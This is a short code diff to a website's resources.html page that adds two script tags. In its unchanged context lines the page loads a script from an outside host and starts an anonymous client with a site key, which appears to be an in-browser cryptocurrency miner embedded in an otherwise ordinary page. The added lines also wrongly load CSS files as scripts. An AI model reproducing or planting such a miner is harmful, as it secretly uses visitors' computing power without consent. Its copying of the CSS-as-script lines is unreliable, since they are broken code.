--- a/resources.html
+++ b/resources.html
@@ -444,6 +444,8 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="/assets/lib/semantic-ui-accordion/accordion.min.css"></script>
+		<script src="/assets/lib/semantic-ui-transition/transition.min.css"></script>
 		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
 		<script>
 		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
